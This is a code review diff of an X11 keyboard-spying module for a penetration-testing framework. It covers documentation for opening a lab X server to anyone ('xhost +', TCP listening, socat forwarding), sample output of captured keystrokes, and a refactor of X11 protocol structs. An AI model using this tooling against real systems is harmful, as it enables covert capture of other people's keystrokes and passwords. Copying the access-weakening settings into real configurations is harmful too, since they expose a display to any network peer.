some review on x11

documentation/modules/auxiliary/gather/x11_keyboard_spy.md

@@ -19,21 +19,21 @@ displayed at poll time. Keys may be repeated or missing.
 1. `sudo nano /etc/gdm/gdm.schemas`
 2. Find:
 
-```
-<schema>
-    <key>security/DisallowTCP</key>
-    <signature>b</signature>
-    <default>true</default>
-</schema>
-```
-- Change `true` to `false`
+    ```
+    <schema>
+     <key>security/DisallowTCP</key>
+     <signature>b</signature>
+     <default>true</default>
+    </schema>
+    ```
+  - Change `true` to `false`
 
 3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
 
-```
-tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
-```
+    ```
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
 
 5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
 
@@ -42,17 +42,17 @@ tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN
 1. `sudo nano /etc/lightdm/lightdm.conf`
 2. Under the `[SeatDefaults]` area, add:
 
-```
-xserver-allow-tcp=true
-allow-guest=true
-```
+    ```
+    xserver-allow-tcp=true
+    allow-guest=true
+    ```
 
 3. logout or reboot
-4. Verification: `sudo netstat -antp | grep 6000`
+4. Verification: ```sudo netstat -antp | grep 6000```
 
-```
-tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
-```
+    ```        	
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
 
 5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
 
@@ -65,9 +65,9 @@ tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN
 1. `vi /etc/gdm/custom.conf`
 2. Under the `[security]` area, add:
 
-```
-DisallowTCP=false
-```
+    ```
+    DisallowTCP=false
+    ```
 
 3. logout/reboot
 4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
@@ -88,8 +88,7 @@ Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilit
 1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
 2. `sudo reboot` # prob a good idea since so much was installed
 3. `sudo xhost +` # must be done through gui, not through SSH
-4. `socat -d -d TCP-LISTEN:6000,fork,bind=<IP to listen to here> UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to
-use `X1` instead of `X0` depending on context.
+4. `socat -d -d TCP-LISTEN:6000,fork,bind=<IP to listen to here> UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
 
 ## Verification Steps
 
@@ -122,23 +121,23 @@ msf6 auxiliary(gather/x11_keyboard_spy) > run
 [*] Running module against 127.0.0.1
 
 [*] 127.0.0.1:6000 - Establishing TCP Connection
-[*] 127.0.0.1:6000 - (1/9) Establishing X11 connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
 [-] 127.0.0.1:6000 - Connection packet malfored (size: 8192), attempting to get read more data
 [+] 127.0.0.1:6000 - Successly established X11 connection
 [*] 127.0.0.1:6000 - Version: 11.0
 [*] 127.0.0.1:6000 - Screen Resolution: 958x832
 [*] 127.0.0.1:6000 - Resource ID: 33554432
 [*] 127.0.0.1:6000 - Screen root: 1320
-[*] 127.0.0.1:6000 - (2/9) Checking on BIG-REQUESTS extension
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
 [+] 127.0.0.1:6000 -   Extension BIG-REQUESTS is present with id 134
-[*] 127.0.0.1:6000 - (3/9) Enabling BIG-REQUESTS
-[*] 127.0.0.1:6000 - (4/9) Creating new graphical context
-[*] 127.0.0.1:6000 - (5/9) Checking on XKEYBOARD extension
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
 [+] 127.0.0.1:6000 -   Extension XKEYBOARD is present with id 136
-[*] 127.0.0.1:6000 - (6/9) Enabling XKEYBOARD
-[*] 127.0.0.1:6000 - (7/9) Requesting XKEYBOARD map
-[*] 127.0.0.1:6000 - (8/9) Enabling notification on keyboard and map
-[*] 127.0.0.1:6000 - (9/9) Creating local keyboard map
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
 [+] 127.0.0.1:6000 - All setup, watching for keystrokes
 t
 e

lib/msf/core/exploit/remote/x11.rb

@@ -13,40 +13,43 @@ module Msf::Exploit::Remote::X11
   include Msf::Exploit::Remote::X11::Keysymdef
   include Msf::Exploit::Remote::X11::Window
 
-  class X11GETPROPERTYRESPONSE < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__get__property__reply__t.html
+  class X11GetPropertyResponse < BinData::Record
     endian :little
     uint8 :reply
     uint8 :format
     uint16 :sequence_number # GetProperty
-    uint32 :reply_length
+    uint32 :response_length
     uint32 :get_property_type # 8bit boolean, \x01 == true \x00 == false
     uint32 :bytes_after
     uint32 :value_length
-    uint32 :unused
-    uint32 :unused1
-    uint32 :unused2
+    uint32 :pad0
+    uint32 :pad1
+    uint32 :pad2
     string :value_data, read_length: -> { value_length }
   end
 
-  class X11GETPROPERTYREQUEST < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__get__property__request__t.html
+  class X11GetPropertyRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 20 # GetProperty
     uint8 :delete_field, initial_value: 0 # \x00 false, assuming \x01 true?
     uint16 :request_length, value: -> { num_bytes / 4 }
-    uint32 :window # X11CONNECTION.screen_root
+    uint32 :window # X11ConnectionResponse.screen_root
     uint32 :property, initial_value: 23 # "\x17\x00\x00\x00" RESOURCE_MANAGER
     uint32 :get_property_type, initial_value: 31 # "\x1f\x00\x00\x00" # get-property-type (31 = string)
     uint32 :long_offset, value: 0
     uint32 :content_length, value: 100_000_000 # "\x00\xe1\xf5\x05"
   end
 
-  class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__create__gc__request__t.html
+  class X11CreateGraphicalContextRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 55 # CreateGC (CreateGraphicalContext)
-    uint8 :unused
+    uint8 :pad0
     uint16 :request_length, value: -> { num_bytes / 4 }
-    uint32 :cid # X11CONNECTION.resource_id
-    uint32 :drawable # X11CONNECTION.screen_root
+    uint32 :cid # X11ConnectionResponse.resource_id
+    uint32 :drawable # X11ConnectionResponse.screen_root
     # gc-value-mask mappings from wireshark, uint32 total size
     # .... .... .... .... .... .... .... ...0 = function: False
     # .... .... .... .... .... .... .... ..0. = plane-mask: False
@@ -103,49 +106,54 @@ class X11CREATEGRAPHICALCONTEXTREQUEST < BinData::Record
     uint32 :background, initial_value: 16777215
   end
 
-  class X11FREEGRAPHICALCONTEXTREQUEST < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__free__gc__request__t.html
+  class X11FreeGraphicalContextRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 60 # FreeGC
-    uint8 :unused, value: 1
+    uint8 :pad0, value: 1
     uint16 :request_length, value: -> { num_bytes / 4 }
-    uint32 :gc # X11CONNECTION.resource_id_base
+    uint32 :gc # X11ConnectionResponse.resource_id_base
   end
 
-  class X11GETINPUTFOCUSREQUEST < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__get__input__focus__request__t.html
+  class X11GetInputFocusRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 43 # GetInputFocus
-    uint8 :unused
+    uint8 :pad0
     uint16 :request_length, value: -> { num_bytes / 4 }
   end
 
-  class X11INTERNATOMREQUEST < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__intern__atom__request__t.html
+  class X11InternAtomRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 16 # InternAtom
     uint8 :only_if_exists, initial_value: 0 # 0 false, 1 true?
     uint16 :request_length, value: -> { num_bytes / 4 }
     uint16 :name_length, value: -> { name.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
-    uint16 :unused, initial_value: 0
+    uint16 :pad0, initial_value: 0
     string :name, trim_padding: true
   end
 
-  class X11INTERNATOMRESPONSE < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__intern__atom__reply__t.html
+  class X11InternAtomResponse < BinData::Record
     endian :little
     uint8 :reply
-    uint8 :unused
+    uint8 :pad0
     uint16 :sequence_number
-    uint32 :reply_length
+    uint32 :response_length
     uint32 :atom
-    rest :pad
+    rest :pad1
   end
 
-  class X11ERROR < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__generic__error__t.html
+  class X11Error < BinData::Record
     endian :little
     uint8 :response_type # 0 = Error, 1 = Reply
     uint8 :error_code # 8 = BadMatch
     uint16 :sequence_number
     uint32 :bad_value
     uint16 :minor_opcode
     uint16 :major_opcode
-    uint8 :unused
+    uint8 :pad0
   end
 end

lib/msf/core/exploit/remote/x11/connect.rb

@@ -8,7 +8,7 @@
 
 module Msf::Exploit::Remote::X11::Connect
   # https://xcb.freedesktop.org/manual/structxcb__visualtype__t.html
-  class X11VISUALTYPE < BinData::Record
+  class X11VisualType < BinData::Record
     endian :little
     uint32 :visualid
     uint8 :visual_type_classclass
@@ -20,35 +20,36 @@ class X11VISUALTYPE < BinData::Record
     uint32 :pad
   end
 
-  class X11DEPTHDETAIL < BinData::Record
+  # https://xcb.freedesktop.org/manual/structxcb__depth__t.html
+  class X11DepthDetail < BinData::Record
     endian :little
     uint8 :depth
-    uint8 :pad
+    uint8 :pad0
     uint16 :visualtypes_numbers
     uint32 :pad1
     array :depth_detail,
-          type: :X11VISUALTYPE,
+          type: :X11VisualType,
           initial_length: :visualtypes_numbers
   end
 
   # https://xcb.freedesktop.org/manual/structxcb__format__t.html
-  class X11PIXMAPFORMAT < BinData::Record
+  class X11PixMapFormat < BinData::Record
     endian :little
     uint8 :depth
     uint8 :bits_per_pixel
     uint8 :scanline_pad
-    uint8 :pad
+    uint8 :pad0
     uint32 :pad1
   end
 
   # https://xcb.freedesktop.org/manual/structxcb__setup__t.html
-  class X11CONNECTION < BinData::Record
+  class X11ConnectionResponse < BinData::Record
     endian :little
     uint8 :success # 8bit boolean, \x01 == true \x00 == false
-    uint8 :pad
+    uint8 :pad0
     uint16 :protocol_version_major
     uint16 :protocol_version_minor
-    uint16 :reply_length
+    uint16 :response_length
     uint32 :release_number
     uint32 :resource_id_base
     uint32 :resource_id_mask
@@ -63,10 +64,10 @@ class X11CONNECTION < BinData::Record
     uint8 :bitmap_format_scanline_pad
     uint8 :min_keycode
     uint8 :max_keycode
-    uint32 :pad2
+    uint32 :pad1
     string :vendor, read_length: :vendor_length
     array :pixmap_formats,
-          type: :X11PIXMAPFORMAT,
+          type: :X11PixMapFormat,
           initial_length: :number_of_formats_in_pixmap_formats
 
     # screen subsection
@@ -87,20 +88,37 @@ class X11CONNECTION < BinData::Record
     uint8 :screen_root_depth
     uint8 :screen_allowed_depths_len
     array :depth_detail,
-          type: :X11DEPTHDETAIL,
+          type: :X11DepthDetail,
           initial_length: :screen_allowed_depths_len
   end
 
   # https://xcb.freedesktop.org/manual/structxcb__setup__request__t.html
-  class X11CONNECTIONREQUEST < BinData::Record
+  class X11ConnectionRequest < BinData::Record
     # only 1/2 implemented since we dont have any authorization items added
     endian :little
     uint8 :byte_order, value: 108 # Little-endian
-    uint8 :pad, value: 0
+    uint8 :pad0, value: 0
     uint16 :protocol_version_major, value: 11
     uint16 :protocol_version_minor, value: 0
     uint16 :authorization_protocol_name_length, value: 0
     uint16 :authorization_protocol_data_length, value: 0
-    uint16 :pad2, value: 0
+    uint16 :pad1, value: 0
+  end
+
+  def print_connection_info(connection, ip, port)
+    print_good("#{ip} - Successly established X11 connection")
+        vprint_status("  Vendor: #{connection.vendor}")
+        vprint_status("  Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
+        vprint_status("  Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
+        vprint_status("  Resource ID: #{connection.resource_id_base.inspect}")
+        vprint_status("  Screen root: #{connection.screen_root.inspect}")
+        report_note(
+          host: ip,
+          proto: 'tcp',
+          sname: 'x11',
+          port: port,
+          type: 'x11.server_vendor',
+          data: "Open X Server (#{connection.vendor})"
+        )
   end
 end

lib/msf/core/exploit/remote/x11/extensions.rb

@@ -8,32 +8,32 @@
 
 module Msf::Exploit::Remote::X11::Extensions
   # https://xcb.freedesktop.org/manual/structxcb__query__extension__reply__t.html
-  class QUERYEXTENSIONRESPONSE < BinData::Record
+  class X11QueryExtensionResponse < BinData::Record
     endian :little
     uint8 :reply
     uint8 :pad
     uint16 :sequence_number # QueryExtension
-    uint32 :reply_length
+    uint32 :response_length
     uint8 :present # 8bit boolean, \x01 == true \x00 == false
     uint8 :major_opcode # this is the ID of the extension
     uint8 :first_event
     uint8 :first_error
   end
 
   # https://xcb.freedesktop.org/manual/structxcb__query__extension__request__t.html
-  class QUERYEXTENSION < BinData::Record
+  class X11QueryExtensionRequest < BinData::Record
     endian :little
     uint8 :opcode, value: 98 # QueryExtension
-    uint8 :pad, value: 0
+    uint8 :pad0, value: 0
     uint16 :request_length, value: -> { num_bytes / 4 }
     uint16 :extension_length, value: -> { extension.to_s.gsub(/\x00+\z/, '').length } # cut off the \x00 padding
-    uint16 :pad2, initial_value: 0 # seems to possibly be a counter for how many times this has been called
+    uint16 :pad1, initial_value: 0 # seems to possibly be a counter for how many times this has been called
     string :extension, length: 12, trim_padding: true
   end
 
-  class EXTENSIONTOGGLE < BinData::Record
+  class X11ExtensionToggleRequest < BinData::Record
     endian :little
-    uint8 :opcode # X11QUERYEXTENSIONRESPONSE.major-opcode
+    uint8 :opcode # X11QueryExtensionResponse.major-opcode
     uint8 :toggle, initial_value: 0 # 0 enable
     uint16 :request_length, value: -> { num_bytes / 4 }
     uint16 :wanted_major, onlyif: :versions? # extension major version

lib/msf/core/exploit/remote/x11/keysymdef.rb

@@ -10,7 +10,7 @@
 #
 
 module Msf::Exploit::Remote::X11::Keysymdef
-  KEYSYM_HASH = {
+  X11KEYSYM_HASH = {
     65288 => '[BackSpace]',    # XK_BackSpace
     65289 => '[Tab]',          # XK_Tab
     65290 => '[Linefeed]',     # XK_Linefeed